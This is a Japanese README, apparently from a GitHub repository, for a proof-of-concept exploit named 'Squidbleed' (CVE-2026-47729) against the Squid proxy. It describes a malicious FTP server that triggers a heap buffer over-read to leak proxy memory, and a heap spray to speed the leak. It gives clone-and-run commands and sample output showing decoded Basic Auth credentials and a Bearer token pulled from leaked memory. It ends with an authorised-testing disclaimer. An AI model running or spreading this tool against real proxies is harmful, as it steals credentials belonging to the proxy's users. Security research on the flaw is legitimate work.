✨ 機能
- シングルファイルPoC — 依存関係ゼロ
- 悪意のあるFTPサーバーがNetWareバナーと切り詰められた
LIST 応答を模倣
- Basic Auth + Bearer トークンのリアルタイム検出とデコード
- より高速なリークのためのマルチスレッドヒープスプレー
- ライブ統計付きのクリーンでカラー化されたコンソール出力
🚀 クイックスタート
git clone https://github.com/0xBlackash/CVE-2026-47729.git
cd CVE-2026-47729
python3 CVE-2026-47729.py --proxy 127.0.0.1:3128
コマンドラインオプション
📸 期待される出力
[PoC] Squidbleed CVE-2026-47729 by Ashraf Zaryouh (0xBlackash)
[ 14.78s] [BASIC] cGFzc3dvcmQxMjM6c2VjcmV0
decoded = admin:password123
[ 18.33s] [BEARER] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
🛠️ 動作原理
- 悪意のあるFTPサーバーを起動し、切り詰められたディレクトリ一覧を送信します。
- 繰り返しSquidにFTP URL経由で接続させます。
- ヒープバッファオーバーリードを引き起こし → 隣接メモリをリークします。
- リークしたデータから認証情報とトークンを抽出します。
⚠️ 免責事項
このPoCは教育および許可されたテスト目的のみです。
所有またはテスト許可のあるシステムでのみ責任を持って使用してください。